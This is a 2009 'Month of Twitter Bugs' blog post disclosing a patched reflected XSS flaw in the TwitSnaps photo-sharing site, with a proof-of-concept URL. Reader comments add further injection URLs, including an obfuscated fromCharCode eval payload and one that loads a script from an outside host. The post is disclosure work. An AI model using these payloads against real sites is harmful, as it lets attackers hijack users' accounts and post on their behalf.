Month of Twitter Bugs - The TwitSnaps application is susceptible to a reflect cross site scripting vulnerability.
1aa2f141901738d38bfae80def5fd9ab666dedfd8d188000f20b7e448e099472
Sunday, July 5, 2009
MoTB #05: Reflected XSS in TwitSnaps
What is TwitSnaps
"We tweet your photos, that's what we do! You want to share your photographs on Twitter? TwitSnaps is at your service." (TwitSnaps about page)
Twitter affect
TwitSnaps can be used to send tweets by uploading new photos, or posting comments on existing photos.
TwitSnaps is using Username/Password authentication in order to utilize the Twitter API.
Popularity rate
A competitor to TwitPic in the Twitter photo sharing market. Not a big competitor, though - 2.5 twits
Vulnerability: Reflected Cross-Site in the Search page.
Status: Patched.
Details: The TwitSnaps page does not encode HTML entities in the "search" variable, which can allow the injection of scripts. This vulnerability could have allowed an attacker to send tweets on behalf of its victims.
Proof-of-Concept: http://twitsnaps.com/search.php?searchfield=xxx%3C%2Ftitle%3E%3Cscript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3E
Vendor response rate
Vulnerability was fixed 5 days after it has been reported.
Additional information provider by people commenting states this is still vulnerable:
Blogger d3v1l said...
still vulnerable :)
poc:
http://twitsnaps.com/full_photo.php?img_id=XSS
anyway,Keep up the good work
Regards!
Blogger Martin H said...
d3v1l I couldn't get it to go through.
Closest I could get was (my script was not actioned just broke out of the tags)
http://twitsnaps.com/full_photo.php?img_id=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E
My version on an easy xss is
http://twitsnaps.com/full_photo.php?img_id=3270&act=%22%27%3E%3Cscript%3Eeval(String.fromCharCode(97%2C108%2C101%2C114%2C116%2C40%2C34%2C88%2C83%2C83%2C32%2C102%2C111%2C117%2C110%2C100%2C32%2C98%2C121%2C32%2C84%2C104%2C101%2C84%2C101%2C115%2C116%2C77%2C97%2C110%2C97%2C103%2C101%2C114%2C46%2C99%2C111%2C109%2C32%2C45%2C32%2C83%2C116%2C105%2C108%2C108%2C32%2C69%2C120%2C105%2C115%2C116%2C115%2C34%2C41%2C59))%3C%2Fscript%3E%3C!--
Anonymous Anonymous said...
GET:
http://twitsnaps.com/home.php?ob=%22%3E%3Cscript src%3d//ckers.org/s%3E%3C/script%3E
July 6, 2009 7:35 PM